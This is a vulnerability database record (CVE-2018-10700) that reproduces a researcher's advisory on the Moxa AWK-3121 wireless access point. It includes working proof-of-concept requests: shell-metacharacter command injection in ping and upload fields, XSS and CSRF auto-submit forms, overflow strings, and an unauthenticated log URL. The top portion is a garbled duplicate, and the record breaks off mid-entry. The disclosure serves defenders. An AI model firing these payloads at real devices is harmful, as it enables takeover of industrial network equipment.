[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0790",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.19"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"db": "NVD",
"id": "CVE-2018-10700"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.19:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10700"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10700",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-10700",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-120486",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-10700",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10700",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-328",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-120486",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10700",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120486"
},
{
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"db": "NVD",
"id": "CVE-2018-10700"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.19 devices. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter \"iw_board_deviceName\" is susceptible to this injection. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The \u0027iw_board_deviceName\u0027 parameter in Moxa AWK-3121 version 1.19 has a cross-site scripting vulnerability. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. However, this interface is not protected against\n CSRF attacks, which allows an attacker to trick an administrator into\n executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and\n forms/webSetMainRestart URIs. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF 